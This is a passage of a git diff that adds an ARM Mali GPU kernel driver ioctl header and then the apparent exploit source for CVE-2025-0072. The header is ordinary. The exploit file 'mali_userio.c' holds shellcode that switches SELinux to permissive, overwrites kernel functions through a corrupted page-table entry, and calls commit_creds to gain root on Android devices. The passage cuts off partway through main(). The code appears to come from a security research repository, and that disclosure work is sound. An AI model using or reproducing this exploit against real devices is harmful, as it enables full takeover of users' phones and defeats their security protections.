+ */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + 
} out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + 
_IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_cinstr_gwt_dump - Used to collect all GPU write fault + * addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. 
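The enum-info ioctl described above (its struct is defined just below) uses a common two-call pattern: first with a NULL list pointer to learn the item size and count, then again with an allocated buffer. A hedged sketch with a hypothetical helper name:

```c
#include <stdlib.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <err.h>
#include "mali_kbase_ioctl.h"

static void *enum_prfcnt_items(int fd, __u32 *count, __u32 *item_size)
{
    struct kbase_ioctl_kinstr_prfcnt_enum_info info = {0};
    if (ioctl(fd, KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO, &info) < 0)
        err(1, "prfcnt enum (size query)");   /* info_list_ptr == NULL here */

    void *items = calloc(info.info_item_count, info.info_item_size);
    info.info_list_ptr = (__u64)(uintptr_t)items;
    if (ioctl(fd, KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO, &info) < 0)
        err(1, "prfcnt enum (fetch)");
    *count = info.info_item_count;
    *item_size = info.info_item_size;
    return items;
}
```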
+ */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... 
+ * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define 
KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 +#ifdef __cplusplus +} +#endif + +#endif /* _UAPI_KBASE_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c new file mode 100644 index 0000000..a012a31 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_userio.c @@ -0,0 +1,223 @@ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <stdint.h> +#include <fcntl.h> +#include <unistd.h> +#include <err.h> +#include <errno.h> +#include <sys/mman.h> +#include <sys/ioctl.h> +#include "stdbool.h" +#include <sys/types.h> +#include <sys/stat.h> + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2411; + +static uint64_t avc_deny = AVC_DENY_2411; + +/* +Shellcode to set SELinux to permissive: + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strncmp(file_path, MALI, 10) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +int find_pgd(uint64_t* userio_addr) { + for (int i = 0; i < 0x2000/8; i++) { + uint64_t entry = *(userio_addr + i + 0x1000/8); + if ((entry & 0x443) == 0x443) { + LOG("found entry %lx at %d in page %d\n", entry, i%(0x1000/8), i/(0x1000/8)); + return i/(0x1000/8); + } + } + return -1; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, &reg) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create 
failed\n"); + } + return queue_new.id; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t* overwrite_index = (uint64_t*)(pgd + OVERWRITE_INDEX * sizeof(uint64_t)); + *overwrite_index = avc_deny_addr; + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + *overwrite_index = sel_read_enforce_addr; + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2411, COMMIT_CREDS_2411, SEL_READ_ENFORCE_2411, ADD_INIT_2411, ADD_COMMIT_2411, &(root_code[0])); + + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + int mali_fd = find_mali_fd(); + + void* gpu_addr = map_gpu(mali_fd, 1, 1, false, 0); + LOG("gpu_addr %lx\n", (uint64_t)gpu_addr); + queue_register(mali_fd, (uint64_t)gpu_addr, 0x1000); + union kbase_ioctl_cs_queue_group_create gc = {0}; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &gc) < 0) { + err(1, "Failed to create group\n"); + } + uint8_t group_handle = gc.out.group_handle; + uint64_t cookie = queue_bind(mali_fd, (uint64_t)gpu_addr, group_handle, 0); + LOG("group_handle %d cookie %lx\n", group_handle, cookie); + uint64_t* queue_userio = (uint64_t*)mmap(NULL, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookie); + if (queue_userio == MAP_FAILED) { + err(1, "mmap failed\n"); + } + struct kbase_ioctl_cs_queue_group_term gt = {0}; + gt.group_handle = group_handle; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE, >) < 0) { + err(1, "Failed to terminate group\n"); + } + union kbase_ioctl_cs_queue_group_create gc2 = {0}; + if (ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &gc2) < 0) { + err(1, "Failed to create group\n"); + } + group_handle = gc2.out.group_handle; + cookie = queue_bind(mali_fd, (uint64_t)gpu_addr, group_handle, 0); + LOG("group_handle %d cookie %lx\n", group_handle, cookie); + uint64_t* queue_userio2 = (uint64_t*)mmap(NULL, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookie); + if (queue_userio2 == MAP_FAILED) { + err(1, "mmap2 
